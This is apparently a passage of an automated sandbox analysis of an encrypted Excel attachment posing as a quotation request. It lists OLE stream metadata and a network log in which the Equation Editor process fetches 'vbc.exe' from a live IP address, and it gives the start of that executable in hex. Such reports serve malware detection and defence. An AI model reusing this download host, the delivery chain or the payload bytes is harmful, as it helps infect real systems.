      SHA512:e7bfe8868a9335ff725aa5bd3ce237856c6e9662fa00a714f5daec664a35071363fffcf3b8d59f13e4e3f69deda06a538ac299a24c02d13df3cf3126c708d4f7
      SSDEEP:24576:5WM/J7onhseyi6szlMiOwqIZMBXwiivDfizo3CbOKBtgninGdLwdc/14/b:5T/VshstlGBZKXxsuJbjDmV/Cj
      File Content Preview:........................>...............................................................................................z.......|.......~......................................................................................................................

      File Icon

      Icon Hash:e4e2aa8aa4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "Order Request for Quotation.xlsx"

      Indicators

      Has Summary Info:False
      Application Name:unknown
      Encrypted Document:True
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:False
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:False

      Streams

      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
      General
      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
      File Type:data
      Stream Size:64
      Entropy:2.73637206947
      Base64 Encoded:False
      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
      General
      Stream Path:\x6DataSpaces/DataSpaceMap
      File Type:data
      Stream Size:112
      Entropy:2.7597816111
      Base64 Encoded:False
      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
      General
      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
      File Type:data
      Stream Size:200
      Entropy:3.13335930328
      Base64 Encoded:False
      Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
      General
      Stream Path:\x6DataSpaces/Version
      File Type:data
      Stream Size:76
      Entropy:2.79079600998
      Base64 Encoded:False
      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
      Stream Path: EncryptedPackage, File Type: data, Stream Size: 1161656
      General
      Stream Path:EncryptedPackage
      File Type:data
      Stream Size:1161656
      Entropy:7.99848190617
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . ] . ) " . . K S . ) 3 . . v . . . . h . E . . . n . w . . . . . . . . e ] . . . . { P y . e ) M $ . & . s . . . - P r ` . . ~ 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0
      Data Raw:a5 b9 11 00 00 00 00 00 04 5d e9 29 22 90 bf 4b 53 ec 29 33 c2 8b 76 ee d6 af b1 68 8a 45 0f 85 0c 6e 88 77 cc 80 94 0b d8 06 d2 95 65 5d 89 a2 95 19 7b 50 79 cf 65 29 4d 24 a3 26 f7 73 ea 9e ab 2d 50 72 60 1e d5 7e 38 84 23 69 3b 33 1d 30 86 2c a4 ee 52 80 d2 7b 38 84 23 69 3b 33 1d 30 86 2c a4 ee 52 80 d2 7b 38 84 23 69 3b 33 1d 30 86 2c a4 ee 52 80 d2 7b 38 84 23 69 3b 33 1d 30
      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
      General
      Stream Path:EncryptionInfo
      File Type:data
      Stream Size:224
      Entropy:4.5241562268
      Base64 Encoded:False
      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . 3 e \\ . s h X J ' . U . . G . H . 5 . . . g . . . F . . . . . . . . . . . L y . . . . . . . . l . 1 H . . . . . = . { S . O C . . .
      Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jul 20, 2021 14:02:41.170805931 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.306423903 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.306543112 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.307029009 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.445785046 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.445816040 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.445833921 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.445851088 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.446018934 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.446048975 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.582732916 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.582770109 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.582791090 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.582817078 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.582909107 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.582911015 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.582931995 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.582937956 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.582941055 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.582957983 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.582967043 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.582981110 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.582989931 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.583060980 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.721278906 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721303940 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721318960 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721333981 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721349001 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721363068 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721379042 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721393108 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721411943 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721426964 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721432924 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.721441984 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721455097 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.721457005 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721471071 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.721472979 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721487045 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721487045 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.721502066 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721503019 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.721515894 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.721518040 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.721533060 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.721549988 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.724216938 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.856997013 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857211113 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857212067 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857239962 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857253075 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857264042 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857275009 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857285976 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857299089 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857310057 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857320070 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857331038 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857350111 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857353926 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857372999 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857376099 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857384920 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857400894 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857409954 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857423067 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857429028 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857443094 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857453108 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857465029 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857475996 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857487917 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857496977 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857507944 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857516050 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857528925 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857537031 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857551098 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857561111 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857575893 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857579947 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857599020 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857605934 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857620001 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857628107 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857641935 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857649088 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857662916 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857671022 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857685089 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857693911 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857707024 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857709885 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857728004 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857736111 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857752085 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857755899 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857774019 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857780933 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857795954 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857804060 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857817888 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857827902 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857840061 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857846975 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857860088 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.857871056 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.857892036 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.860497952 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.993609905 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993654013 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993683100 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993688107 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.993705988 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993729115 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993732929 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.993752003 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993760109 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.993773937 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993788004 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.993798971 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993823051 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993830919 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.993848085 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993869066 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.993872881 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993905067 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.993912935 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993937016 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993957043 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.993978977 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.994000912 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.994035959 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.994051933 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.994060993 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.994066954 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.994070053 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.994071960 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.994083881 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.994105101 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.994115114 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.994127989 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.994153023 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.994163036 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.994174957 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.994196892 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.994198084 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.994210005 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.994220018 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.994226933 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.994316101 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.996525049 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.997090101 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.997138023 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.997152090 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.997174025 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.997190952 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.997210026 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.997221947 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.997256994 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.997270107 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.997309923 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:41.997328997 CEST8049165198.12.91.134192.168.2.22
      Jul 20, 2021 14:02:41.997385025 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:42.000879049 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:42.003982067 CEST4916580192.168.2.22198.12.91.134
      Jul 20, 2021 14:02:42.523250103 CEST4916580192.168.2.22198.12.91.134

      HTTP Request Dependency Graph

      • 198.12.91.134

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249165198.12.91.13480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      TimestampkBytes transferredDirectionData
      Jul 20, 2021 14:02:41.307029009 CEST0OUTGET /hkcmd/vbc.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 198.12.91.134
      Connection: Keep-Alive
      Jul 20, 2021 14:02:41.445785046 CEST2INHTTP/1.1 200 OK
      Date: Tue, 20 Jul 2021 12:02:40 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      Last-Modified: Tue, 20 Jul 2021 09:26:12 GMT
      ETag: "1d000-5c78aa51b4a66"
      Accept-Ranges: bytes
      Content-Length: 118784
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e6 21 01 51 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 40 01 00 00 90 00 00 00 00 00 00 28 11 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 10 00 00 38 e2 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 4b 01 00 28 00 00 00 00 70 01 00 6a 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 3d 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 5c 11 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 6a 6d 00 00 00 70 01 00 00 70 00 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#BBBL^B`BdBRichBPEL!Q@(P@8DK(pjm( t.text=@ `.data\PP@.rsrcjmpp`@@IMSVBVM60.DLL
      Jul 20, 2021 14:02:41.445816040 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Jul 20, 2021 14:02:41.445833921 CEST4INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Jul 20, 2021 14:02:41.445851088 CEST6INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      Jul 20, 2021 14:02:41.582732916 CEST7INData Raw: fd e3 ea 71 b2 fd 57 71 b4 f3 72 71 8e 8e 8e 71 71 1f ea 71 52 05 b3 71 72 e3 b2 71 43 f2 a9 71 2a a7 9b 71 50 02 f4 71 71 10 fc 71 33 e8 95 71 47 ab 9c 71 6d dd a4 71 0e 0d 0a 71 62 07 ea 71 ae c2 15 71 9e 9f 9f 71 ee 18 77 71 21 b6 92 71 fc 95
      Data Ascii: qWqrqqqqRqrqCq*qPqqq3qGqmqqbqqqwq!qqLq^qq5qfqq@qD.qq]qqq7qHqqq0q.q1qqqqqc(qqqqiqqqq>qqlqSq@-qkqq>q2qq| qk
      Jul 20, 2021 14:02:41.582770109 CEST9INData Raw: 28 c6 b6 b6 b6 b6 b6 b6 b6 55 0d 0d 6c 30 73 73 fc c0 b0 e5 32 27 ae 0d 0d 70 70 e3 e3 6a ac 3a 61 b3 b3 b3 b3 b3 c1 c1 c1 c1 61 61 3a 45 af af 28 ad 53 53 53 53 53 53 16 6c 0d 0d 0d 8c 73 73 b6 39 d0 32 32 51 25 6c 0d 70 70 e3 e3 c2 ac c8 2e 2e
      Data Ascii: (Ul0ss2'ppj:aaa:E(SSSSSSlss922Q%lpp....mmmmmmmm44QAAAAAssshQ%lpp.mmm5kWv+++++s"'lppjjrrrr````DUlSSs9'"ppjj$[N
